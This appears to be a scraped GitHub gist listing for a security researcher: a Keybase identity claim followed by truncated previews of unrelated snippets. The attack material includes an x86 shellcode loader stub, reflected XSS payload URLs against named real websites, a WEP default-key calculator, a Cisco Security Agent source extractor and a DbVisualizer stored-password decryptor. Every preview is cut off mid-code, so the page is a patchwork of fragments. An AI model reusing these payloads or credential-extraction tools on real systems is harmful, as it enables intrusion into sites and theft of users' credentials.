I hereby claim:
- I am gerry on github.
- I am gerry (https://keybase.io/gerry) on keybase.
- I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF
To claim this, I am signing this object:
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] |
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC | |
# address of the router (1801 or 1F90) | |
def get_key(essid): | |
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid)) | |
return hex(key) | |
# >>> print get_key("E3X12") | |
# 0x349fca |
#!/usr/bin/env python | |
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console. | |
Gerry <gerry@hiredhacker.com> | |
""" | |
import os | |
import sys | |
import struct | |
import pefile | |
from itertools import takewhile |
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E | |
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4 | |
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E | |
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29 | |
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;// | |
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22 | |
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry | |
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware | |
http://products.verizonwireless.com/index.aspx?';alert(1)// |
#!/usr/bin/env python | |
# Thu 24 Jun 2010 04:20:52 AM EDT | |
import httplib | |
import mimetools | |
import StringIO | |
_boundary = mimetools.choose_boundary() | |
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' | |
_csamc = "192.168.0.108" |
# Drop this into msf3 root-dir as 'msf-rex.gemspec'. | |
# | |
# Create gem with: | |
# $ gem build msf-rex.gemspec | |
# | |
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'. | |
# We can still "require 'rex'" though. | |
$: << 'lib' |
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb | |
index 7e0bc73..9b5c8d8 100644 | |
--- a/lib/msf/core/db.rb | |
+++ b/lib/msf/core/db.rb | |
@@ -5163,11 +5163,11 @@ class DBManager | |
# There is no place the NBE actually stores the plugin name used to | |
# scan. You get "Security Note" or "Security Warning," and that's it. | |
def import_nessus_nbe(args={}, &block) | |
- data = args[:data] | |
+ nbe_data = args[:data] |
#!/usr/bin/env python | |
# decrypt_dbvis.py ~ gerry@twitter.com | |
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords. | |
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files. | |
# Tested against DbVisualizer Free 9.0.9 and 9.1.6 | |
""" | |
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py | |
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur) | |
[+] Additional Usage Options: | |
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename> |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python | |
import sys | |
import random | |
import string | |
import datetime | |
import itertools | |
import threading | |
import traceback | |
import SocketServer | |
import operator as op |